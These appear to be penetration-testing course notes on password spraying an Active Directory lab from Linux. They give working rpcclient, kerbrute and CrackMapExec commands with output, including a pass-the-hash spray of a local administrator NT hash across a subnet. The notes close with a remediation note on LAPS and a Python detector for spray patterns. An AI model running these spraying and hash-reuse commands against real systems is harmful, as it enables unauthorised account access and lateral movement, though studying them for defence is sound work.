Internal Spraying - Linux

rpcclient, with this Bash one-liner (adapted from here), can be used to perform the attack.

for u in $(cat valid_users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

We can also use Kerbrute for the same attack.

neutron@kali[/kali]$ kerbrute passwordspray -d legalcorp.local --dc 172.16.5.5 valid_users.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop

2022/02/17 22:57:12 >  Using KDC(s):
2022/02/17 22:57:12 >   172.16.5.5:88

2022/02/17 22:57:12 >  [+] VALID LOGIN:  [email protected]:Welcome1
2022/02/17 22:57:12 >  Done! Tested 57 logins (1 successes) in 0.172 seconds

There are multiple other methods for performing password spraying from Linux.

Using CrackMapExec & Filtering Logon Failures

neutron@kali[/kali]$ sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] legalcorp.local\avazquez:Password123 

We can then use CrackMapExec to validate the credentials quickly against a Domain Controller.

neutron@kali[/kali]$ sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:legalcorp.local) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] legalcorp.local\avazquez:Password123

Local Administrator Password Reuse

Sometimes we may only retrieve the NTLM hash for the local administrator account from the local SAM database. In these instances, we can spray the NT hash across an entire subnet. The --local-auth flag tells the tool to attempt a local logon only once on each machine, which removes any risk of account lockout.

neutron@kali[/kali]$ sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

SMB         172.16.5.50     445    ACADEMY-EA-MX01  [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.25     445    ACADEMY-EA-MS01  [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.125    445    ACADEMY-EA-WEB0  [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)

We could then move to enumerate each system to see if we can find anything that will help further our access.

This technique, while effective, is quite noisy and is not a good choice for any assessment that requires stealth. It is always worth looking for this issue during penetration tests, even if it is not part of our path to compromise the domain, as it is a common issue and should be highlighted for our clients. One way to remediate this issue is to use the free Microsoft tool Local Administrator Password Solution (LAPS).
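Because both techniques above are noisy, they are also detectable. As an added defensive example (not part of these notes or of any of the tools shown), the following Python flags the two patterns from this page in centralised logon records: one source failing against many distinct accounts with only a couple of attempts each (the domain spray), and one account name logging on to many hosts from one source within a short window (the local administrator reuse). The record format, thresholds and every sample value are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, source IP, target host, account, success).
# Source 10.0.0.9 tries one password across 12 accounts (domain spray), then
# one credential against the local administrator of 3 hosts (local-auth reuse).
# Source 10.0.0.20 is a single user mistyping their own password: not a spray.
EVENTS = (
    [(f"2022-02-17T22:57:{i:02d}", "10.0.0.9", "DC01", f"user{i:02d}", False) for i in range(12)]
    + [("2022-02-17T22:57:12", "10.0.0.9", "DC01", "avazquez", True)]
    + [(f"2022-02-17T23:01:{i:02d}", "10.0.0.9", h, "administrator", True)
       for i, h in enumerate(("MX01", "MS01", "WEB0"))]
    + [(f"2022-02-17T22:58:{i:02d}", "10.0.0.20", "DC01", "jdoe", False) for i in range(3)]
)

def _ts(s):
    return datetime.fromisoformat(s)

def find_user_sprays(events, window=timedelta(minutes=5), min_users=10, max_per_user=2):
    """Sources whose failed logons within `window` hit many distinct accounts with
    only a few attempts each. Returns {src_ip: number_of_distinct_accounts}."""
    by_src = defaultdict(list)
    for ts, src, _host, user, ok in events:
        if not ok:
            by_src[src].append((_ts(ts), user))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):      # slide the window over each start
            per_user = defaultdict(int)
            for t, u in fails[i:]:
                if t - start > window:
                    break
                per_user[u] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[src] = max(hits.get(src, 0), len(per_user))
    return hits

def find_host_sprays(events, window=timedelta(minutes=5), min_hosts=3):
    """Same source and same account name reaching many distinct hosts within
    `window`, regardless of outcome. Returns {(src_ip, account): distinct_hosts}."""
    by_key = defaultdict(list)
    for ts, src, host, user, _ok in events:
        by_key[(src, user)].append((_ts(ts), host))
    hits = {}
    for key, rows in by_key.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):
            hosts = {h for t, h in rows[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[key] = max(hits.get(key, 0), len(hosts))
    return hits
```

In a real deployment the records would come from Domain Controller and host logon audit events, and the host-level rule only works when those events are forwarded to a central log.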